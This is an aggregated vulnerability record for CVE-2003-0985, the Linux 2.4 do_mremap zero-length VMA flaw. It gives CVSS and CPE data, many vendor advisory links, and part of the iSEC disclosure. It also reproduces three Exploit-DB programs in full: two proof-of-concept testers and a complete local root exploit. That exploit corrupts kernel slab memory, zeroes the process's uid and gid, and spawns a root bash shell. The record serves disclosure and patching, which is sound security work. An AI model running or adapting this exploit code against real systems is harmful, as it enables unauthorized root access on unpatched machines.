CVE-2003-0985
CVSS7.2
Published: 2004-01-20 00:00:00
Revised: 2016-10-17 22:38:50

[Original text] The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.


[CNNVD] Linux kernel do_mremap local privilege escalation vulnerability (CNNVD-200401-034)

        
        Linux is an open-source operating system.
        The mremap(2) system call in the Linux kernel's memory management code lacks a proper bounds check. A local attacker can exploit this flaw to escalate privileges and execute arbitrary instructions on the system with ROOT privileges.
        The mremap system call is used by applications to change the boundary addresses of mapped regions (VMAs). A typical VMA covers at least one memory page (4 kB on the i386 architecture); the do_mremap() kernel code that remaps a virtual memory area was found to lack a proper bounds check, which can lead to the creation of a virtual memory area 0 bytes in length.
        Such an incorrectly allocated virtual memory area can disrupt the operation of other kernel memory management routines, ultimately leading to unpredictable consequences. Since the mremap(2) system call requires no special privileges to invoke, successful exploitation can yield a UID 0 shell on the system.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:linux:linux_kernel:2.4.0:test4    Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.0:test5    Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.4.1    Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.0    Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.5    Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.4    Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:linux:linux_kernel:2.4.21:pre4    Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.3    Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.4.2    Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.21:pre7    Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.4.0:test12    Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test11    Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.4.0:test1    Linux Kernel 2.4.0 test1
cpe:/o:linux:linux_kernel:2.4.0:test10    Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.12    Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.11    Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.18:pre1    Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2    Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.19:pre1    Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre2    Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.4.19    Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.14    Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.13    Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.16    Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.15    Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.10    Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.18    Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.17    Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.18:pre6    Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.18:pre3    Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.4.18:pre4    Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.19:pre5    Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.4.19:pre6    Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.21:pre1    Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre3    Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.18:pre7    Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.19:pre4    Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.18:pre8    Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.4.23    Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.22    Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.18:pre5    Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.0:test2    Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.0:test3    Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.4.0:test8    Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.4.0:test9    Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.0:test6    Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.0:test7    Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.4.21    Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.20    Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.9    Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.8    Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.4.7    Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.4.6    Linux Kernel 2.4.6

- OVAL (technical details for detection)

oval:org.mitre.oval:def:867    Red Hat Enterprise 3 Linux Kernel do_mremap Denial of Service Vulnerability
oval:org.mitre.oval:def:860    Red Hat Linux Kernel do_mremap Denial of Service Vulnerability
oval:org.mitre.oval:def:10189    The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform...
*OVAL describes in detail how this vulnerability is detected; the related OVAL definitions contain further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0985
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0985
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-034
(official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20040102-01-U
(UNKNOWN)  SGI  20040102-01-U
http://archives.neohapsis.com/archives/bugtraq/2004-01/0070.html
(UNKNOWN)  BUGTRAQ  20040108 [slackware-security] Slackware 8.1 kernel security update (SSA:2004-008-01)
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000799
(UNKNOWN)  CONECTIVA  CLA-2004:799
http://download.immunix.org/ImmunixOS/7.3/updates/IMNX-2004-73-001-01
(UNKNOWN)  IMMUNIX  IMNX-2004-73-001-01
http://isec.pl/vulnerabilities/isec-0013-mremap.txt
(UNKNOWN)  MISC  http://isec.pl/vulnerabilities/isec-0013-mremap.txt
http://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremap
(UNKNOWN)  CONFIRM  http://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremap
http://marc.info/?l=bugtraq&m=107332754521495&w=2
(UNKNOWN)  TRUSTIX  2004-0001
http://marc.info/?l=bugtraq&m=107332782121916&w=2
(UNKNOWN)  BUGTRAQ  20040105 Linux kernel mremap vulnerability
http://marc.info/?l=bugtraq&m=107340358402129&w=2
(UNKNOWN)  BUGTRAQ  20040105 Linux kernel do_mremap() proof-of-concept exploit code
http://marc.info/?l=bugtraq&m=107340814409017&w=2
(UNKNOWN)  BUGTRAQ  20040106 Linux mremap bug correction
http://marc.info/?l=bugtraq&m=107350348418373&w=2
(UNKNOWN)  BUGTRAQ  20040107 [slackware-security] Kernel security update (SSA:2004-006-01)
http://marc.info/?l=bugtraq&m=107394143105081&w=2
(UNKNOWN)  BUGTRAQ  20040112 SmoothWall Project Security Advisory SWP-2004:001
http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0
(UNKNOWN)  CONFIRM  http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0
http://www.ciac.org/ciac/bulletins/o-045.shtml
(UNKNOWN)  CIAC  O-045
http://www.debian.org/security/2004/dsa-413
(UNKNOWN)  DEBIAN  DSA-413
http://www.debian.org/security/2004/dsa-417
(UNKNOWN)  DEBIAN  DSA-417
http://www.debian.org/security/2004/dsa-423
(UNKNOWN)  DEBIAN  DSA-423
http://www.debian.org/security/2004/dsa-427
(UNKNOWN)  DEBIAN  DSA-427
http://www.debian.org/security/2004/dsa-439
(UNKNOWN)  DEBIAN  DSA-439
http://www.debian.org/security/2004/dsa-440
(UNKNOWN)  DEBIAN  DSA-440
http://www.debian.org/security/2004/dsa-442
(UNKNOWN)  DEBIAN  DSA-442
http://www.debian.org/security/2004/dsa-450
(UNKNOWN)  DEBIAN  DSA-450
http://www.debian.org/security/2004/dsa-470
(UNKNOWN)  DEBIAN  DSA-470
http://www.debian.org/security/2004/dsa-475
(UNKNOWN)  DEBIAN  DSA-475
http://www.debian.org/security/2006/dsa-1067
(UNKNOWN)  DEBIAN  DSA-1067
http://www.debian.org/security/2006/dsa-1069
(UNKNOWN)  DEBIAN  DSA-1069
http://www.debian.org/security/2006/dsa-1070
(UNKNOWN)  DEBIAN  DSA-1070
http://www.debian.org/security/2006/dsa-1082
(UNKNOWN)  DEBIAN  DSA-1082
http://www.kb.cert.org/vuls/id/490620
(UNKNOWN)  CERT-VN  VU#490620
http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24
(UNKNOWN)  CONFIRM  http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24
http://www.linuxsecurity.com/advisories/engarde_advisory-3904.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20040105-001
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:001
(UNKNOWN)  MANDRAKE  MDKSA-2004:001
http://www.novell.com/linux/security/advisories/2004_03_linux_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2004:003
http://www.redhat.com/support/errata/RHSA-2003-416.html
(UNKNOWN)  REDHAT  RHSA-2003:416
http://www.redhat.com/support/errata/RHSA-2003-417.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:417
http://www.redhat.com/support/errata/RHSA-2003-418.html
(UNKNOWN)  REDHAT  RHSA-2003:418
http://www.redhat.com/support/errata/RHSA-2003-419.html
(UNKNOWN)  REDHAT  RHSA-2003:419
http://www.securityfocus.com/bid/9356
(VENDOR_ADVISORY)  BID  9356
http://xforce.iss.net/xforce/xfdb/14135
(VENDOR_ADVISORY)  XF  linux-domremap-gain-privileges(14135)

- Vulnerability information

Linux kernel do_mremap local privilege escalation vulnerability
High risk  Boundary condition error
2004-01-20 00:00:00 2006-11-02 00:00:00
Local
        
        

- Advisories and patches

        Vendor patch:
        Linux
        -----
        Linux 2.4.24 has fixed this security issue; download it from the vendor's homepage:
        
        http://www.kernel.org/

- Vulnerability information (141)

Linux Kernel "do_mremap" Local Proof of Concept (EDBID:141)
linux local
2004-01-06 Verified
0 Christophe Devine
N/A
/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

// milw0rm.com [2004-01-06]
		

- Vulnerability information (142)

Linux Kernel "do_mremap" Local Proof of Concept II (EDBID:142)
linux local
2004-01-07 Verified
0 Christophe Devine
N/A
/* 
 * Proof of concept code for testing do_mremap() Linux kernel bug.
 * It is based on the code by Christophe Devine and Julien Tinnes
 * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since 
 * it avoids any kernel data corruption.
 *
 * The following test was done against the Linux kernel 2.6.0. Similar 
 * results were obtained against the kernel 2.4.23 and previous ones.
 *
 * buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
 * buffer@mintaka:~$ ./mremap_bug
 *
 * Base address : 0x60000000
 * 
 * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
 * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
 * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
 * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
 * 40016000-40017000 rw-p 00000000 00:00 0
 * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
 * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
 * 40156000-40159000 rw-p 00000000 00:00 0
 * 60000000-60002000 rw-p 00000000 00:00 0
 * bfffd000-c0000000 rwxp ffffe000 00:00 0
 * 
 * Remapping at 0x70000000...
 * 
 * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
 * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
 * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
 * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
 * 40016000-40017000 rw-p 00000000 00:00 0
 * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
 * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
 * 40156000-40159000 rw-p 00000000 00:00 0
 * 60000000-60002000 rw-p 00000000 00:00 0
 * 70000000-70000000 rw-p 00000000 00:00 0
 * bfffd000-c0000000 rwxp ffffe000 00:00 0
 * 
 * Report :
 * This kernel appears to be VULNERABLE
 *
 * Segmentation fault
 * buffer@mintaka:~$
 */

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strstr() used by maps_check() */
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>
  
#define MREMAP_FIXED    2

#define PAGESIZE 4096
#define VMASIZE  (2*PAGESIZE)
#define BUFSIZE  8192

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

#define MAPS_NO_CHECK 0
#define MAPS_CHECK    1

int mremap_check = 0;

void maps_check(char *buf)
{
	if (strstr(buf, "70000000"))
	    mremap_check++;
}

void read_maps(int fd, char *path, unsigned long flag) 
{
	ssize_t  nbytes;
        char     buf[BUFSIZE];

	if (lseek(fd, 0, SEEK_SET) < 0) {
		fprintf(stderr, "Unable to lseek %s\n", path);
		return;
	}

	while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {

		if (flag & MAPS_CHECK)
			maps_check(buf);

		if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
			fprintf(stderr, "Unable to write contents of %s\n", path);
			exit (1);
		}
	}
}

int main(int argc, char **argv)
{
	void     *base;
	char     path[16];
	pid_t    pid;
	int      fd;
	
	pid = getpid();
	sprintf(path, "/proc/%d/maps", pid);

	/* open() returns -1 on failure, not 0 */
	if ((fd = open(path, O_RDONLY)) < 0) {
		fprintf(stderr, "Unable to open %s\n", path);
		return 1;
	}

	base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
		    MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);

	printf("\nBase address : 0x%lx\n\n", (unsigned long) base);
	read_maps(fd, path, MAPS_NO_CHECK);

	printf("\nRemapping at 0x70000000...\n\n");
	base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
			   (void *)0x70000000);

	read_maps(fd, path, MAPS_CHECK);

	printf("\nReport : \n");
	(mremap_check) 
		? printf("This kernel appears to be VULNERABLE\n\n")
		: printf("This kernel appears to be NOT VULNERABLE\n\n");

	close(fd);
	return 0;
}

// milw0rm.com [2004-01-07]
		

- Vulnerability information (145)

Linux Kernel 2.4.x mremap() bound checking Root Exploit (EDBID:145)
linux local
2004-01-15 Verified
0 Paul Starzetz
N/A
/*
 * Linux kernel mremap() bound checking bug exploit.
 *
 * Bug found by Paul Starzetz <paul isec pl>
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE	1
#define MREMAP_FIXED	2

#define str(s) 	#s
#define xstr(s) str(s)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR	0x2000

#define RNDINT		512

#define NUMVMA		(3 * 5 * 257)
#define NUMFORK		(17 * 65537)

#define DUPTO		1000
#define TMPLEN		256

#define __NR_sys_mremap	163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len,
			 unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


void fatal(const char * msg)
{
	printf("\n");
	if (!errno) {
		fprintf(stderr, "FATAL: %s\n", msg);
	} else {
		perror(msg);
	}

	printf("\nentering endless loop");
	fflush(stdout);
	fflush(stderr);
	while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
	int i, c;
	int *v;

	if (!file)
		goto out;

	__asm__("movl	%%esp, %0" : : "m" (c));

	c &= 0xffffe000;
	v = (void *) c;

	for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
		if (v[i] == uid && v[i+1] == uid) {
			i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
		}
		if (v[i] == gid) {
			v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
			break;
		}
	}
out:
	dummy++;
}

void try_to_exploit(void)
{
	int v = 0;

	v += fops[0];
	v += fake_file[0];

	kernel_code(0, 0, v);
	lseek(DUPTO, 0, SEEK_SET);

	if (geteuid()) {
		printf("\nFAILED uid!=0"); fflush(stdout);
		errno =- ENOSYS;
		fatal("uid change");
	}

	printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

	kill(ppid, SIGUSR1);
	setresuid(0, 0, 0);
	sleep(1);

	printf("\n\n"); fflush(stdout);

	execl("/bin/bash", "bash", NULL);
	fatal("burp");
}

void cleanup(int v)
{
	victim[DUPTO] = victim[0];
	kill(0, SIGUSR2);
}


void redirect_filp(int v)
{
	printf("\n[!] parent check race... "); fflush(stdout);

	if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
		printf("SUCCESS, cought SLAB page!"); fflush(stdout);
		victim[DUPTO] = (unsigned) & fake_file;
		signal(SIGUSR1, &cleanup);
		kill(pid, SIGUSR1);
	} else {
		printf("FAILED!");
	}
	fflush(stdout);
}

int get_slab_objs(void)
{
	FILE * fp;
	int c, d, u = 0, a = 0;
	static char line[TMPLEN], name[TMPLEN];

	fp = fopen("/proc/slabinfo", "r");
	if (!fp)
		fatal("fopen");

	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a =- 1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
		c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
	} while (strcmp(name, "size-4096"));
	
	fclose(fp);

	return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
	int n, c = 1;

	*victim = 0;
	printf("\n[+] parent unprotected PTE "); fflush(stdout);

	dup2(0, 2);
	while (1) {
		n = get_slab_objs();
		if (n < 0)
			fatal("read slabinfo");
		if (n > 0) {
			printf("\n    depopulate SLAB #%d", c++);
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
		}
		if (!n) {
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
			dup2(0, DUPTO);
			break;
		}
	}

	signal(SIGUSR1, &redirect_filp);
	kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
	int i = NUMVMA;

	while (1) {
		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
				MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap1");
		}
		i--;
		if (!i)
			break;

	tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
				MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap2");
		}
		i--;
		if (!i)
			break;
	}
}

void catchme(int v)
{
	blah++;
}

void exitme(int v)
{
	_exit(0);
}

void childrip(int v)
{
	waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
	signal(SIGUSR1, &catchme);
	signal(SIGUSR2, &exitme);
	blah = 0;

	while (1) {
		while (!blah) pause();

		blah = 0;
		if (!fork()) {
			dup2(0, DUPTO);
			kill(getppid(), SIGUSR1);
			while (1) pause();
		} else {
			while (!blah) pause();
			blah = 0; kill(ppid, SIGUSR2);
		}
	}
	exit(0);
}

int main(void)
{
	int i, r, v, cnt;
	time_t start;

	srand(time(NULL) + getpid());
	ppid = getpid();
	uid = getuid();
	gid = getgid();

	hpid = fork();
	if (!hpid)
		slab_helper();

	fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (fops == MAP_FAILED)
		fatal("mmap fops VMA");
	for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
		fops[i] = (unsigned)&kernel_code;
	for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
		fake_file[i] = (unsigned)fops;

	vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_ro == MAP_FAILED)
		fatal("mmap1");

	vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_rw == MAP_FAILED)
		fatal("mmap2");

	cnt = NUMVMA;
	while (1) {
		r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap1");
		}
		cnt--;
		if (!cnt) break;

		r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap2");
		}
		cnt--;
		if (!cnt) break;
	}

	victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (victim != (void *) PAGEADDR)
		fatal("mmap victim VMA");

	v = *victim;
	*victim = v + 1;

	signal(SIGUSR1, &unprotect);
	signal(SIGUSR2, &catchme);
	signal(SIGCHLD, &childrip);
	printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
	start = time(NULL);

	cnt = NUMFORK;
	v = 0;
	while (1) {
		cnt--;
		v--;
		dummy += *victim;

		if (cnt > 1) {
			__asm__(
			"pusha				\n"
			"movl %1, %%eax			\n"
			"movl $("xstr(CLONEFL)"), %%ebx	\n"
			"movl %%esp, %%ecx		\n"
			"movl $120, %%eax		\n"
			"int  $0x80			\n"
			"movl %%eax, %0			\n"
			"popa				\n"
			: : "m" (pid), "m" (dummy)
			);
		} else {
			pid = fork();
		}

		if (pid) {
			if (v <= 0 && cnt > 0) {
				float eta, tm;
				v = rand() % RNDINT / 2 + RNDINT / 2;
				tm = eta = (float)(time(NULL) - start);
				eta *= (float)NUMFORK;
				eta /= (float)(NUMFORK - cnt);
				printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
				NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
				fflush(stdout);
			}
			if (cnt) {
				waitpid(pid, 0, 0);
				continue;
			}
			if (!cnt) {
				while (1) {
					 r = wait(NULL);
					 if (r == pid) {
					cleanup_vmas();
					while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
					 }
				}
			}
		}

		else {
			cleanup_vmas();

			if (cnt > 0) {
				_exit(0);
			}

		printf("\n[+] overflow done, the moment of truth..."); fflush(stdout);
			sleep(1);

			signal(SIGUSR1, &catchme);
			munmap(0, PAGE_SIZE);
			dup2(0, 2);
			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();

			munmap((void *)victim, PAGE_SIZE);
			dup2(0, DUPTO);

			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();
			try_to_exploit();
			while (1) pause();
		}
	}
	return 0;
}



// milw0rm.com [2004-01-15]
		

- Vulnerability information (F32515)

isec-0013v2-mremap.txt (PacketStormID:F32515)
2004-01-15 00:00:00
Wojciech Purczynski,Paul Starzetz  isec.pl
advisory,arbitrary,kernel,local
linux
CVE-2003-0985

The mremap system call in the Linux kernel memory management code has a critical security vulnerability due to incorrect bounds checking. Proper exploitation of this vulnerability may lead to local privilege escalation including execution of arbitrary code with kernel level access. Updated version of the original release of this document.

Synopsis:    Linux kernel do_mremap local privilege escalation vulnerability
Product:     Linux kernel
Version:     2.4 up to 2.4.23 and 2.6.0
Vendor:      http://www.kernel.org/

URL:         http://isec.pl/vulnerabilities/isec-0013-mremap.txt
CVE:         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985
Author:      Paul Starzetz <ihaquer@isec.pl>,
             Wojciech Purczynski <cliph@isec.pl>

Date:        January 5, 2004
Update:      January 15, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel
memory management code in the mremap(2) system call due to incorrect bounds
checks.


Vulnerability details:
======================

The mremap system call provides functionality for resizing (shrinking or
growing) existing virtual memory areas (VMAs), or any part of them, as well
as moving them across the process's addressable space.

A typical VMA covers at least one memory page (which is exactly 4kB on
the i386 architecture). An incorrect bounds check discovered inside the
do_mremap() kernel code performing remapping of a virtual memory area
may lead to creation of a virtual memory area of 0 bytes in length.

The problem is based on the general mremap flaw that remapping of 2 pages
from inside a VMA creates a memory hole of only one page in length but
also an additional VMA of two pages. In the case of a zero sized
remapping request no VMA hole is created, but an additional VMA descriptor
of 0 bytes in length is created.

Such a malicious virtual memory area may disrupt the operation of the other
parts of the kernel memory management subroutines finally leading to 
unexpected behavior.

A typical process's memory layout showing invalid VMA created with
mremap system call:

    08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test
    0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test
    0804d000-0804e000 rwxp 00000000 00:00 0
    40000000-40014000 r-xp 00000000 03:05 1544523    /lib/ld-2.3.2.so
    40014000-40015000 rw-p 00013000 03:05 1544523    /lib/ld-2.3.2.so
    40015000-40016000 rw-p 00000000 00:00 0
    4002c000-40158000 r-xp 00000000 03:05 1544529    /lib/libc.so.6
    40158000-4015d000 rw-p 0012b000 03:05 1544529    /lib/libc.so.6
    4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
    bfffe000-c0000000 rwxp fffff000 00:00 0

The broken VMA in the above example has been marked with a [*].
